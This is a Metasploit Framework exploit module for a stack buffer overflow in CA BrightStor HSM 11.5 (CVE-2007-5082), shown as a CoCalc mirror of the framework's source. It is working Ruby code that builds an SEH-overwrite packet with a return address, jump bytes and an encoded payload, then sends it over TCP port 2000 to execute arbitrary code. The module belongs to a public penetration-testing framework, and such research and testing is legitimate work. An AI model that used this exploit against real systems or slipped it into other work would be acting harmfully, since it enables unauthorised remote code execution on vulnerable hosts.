CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/hsmserver.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'CA BrightStor HSM Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM.

17
        By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.

18
      },

19
      'Author'         => [ 'toto' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'CVE', '2007-5082' ],

24
          [ 'OSVDB', '41363' ],

25
          [ 'BID', '25823' ],

26
        ],

27
      'Privileged'     => true,

28
      'DefaultOptions' =>

29
        {

30
          'EXITFUNC' => 'process',

31
        },

32
      'Payload'        =>

33
        {

34
          'Space'    => 1026,

35
          'BadChars' => "\x00\x0a\x0d;",

36
          'StackAdjustment' => -3500,

37
        },

38
      'Platform' => 'win',

39
      'Targets'  =>

40
        [

41
          # NX can be bypassed by brute forcing ntdll addresses as the process is restarted

42
          # pop/pop/ret in fpparser.dll (old from 2004)

43
          [ 'BrightStor HSM 11.5 Windows All',	{ 'Ret' => 0x12014c78 } ],

44
        ],

45
      'DisclosureDate' => '2007-09-27',

46
      'DefaultTarget' => 0))

47


48
    register_options(

49
      [

50
        Opt::RPORT(2000)

51
      ])

52
  end

53


54
  def exploit

55
    connect

56


57
    data =

58
      [42,7,0,0].pack('VVVV') +

59
      payload.encoded +

60
      "\xeb\x06" +

61
      Rex::Text.rand_text_alphanumeric(2) +

62
      [ target.ret ].pack('V') +

63
      "\xe9\xf1\xfb\xff\xff" +

64
      Rex::Text.rand_text_alphanumeric(0x100)

65


66
    sploit = [data.length + 4].pack('V') + data

67


68
    print_status("Trying target #{target.name}...")

69


70
    sock.put(sploit)

71
    handler

72
    disconnect

73
  end

74
end

75


76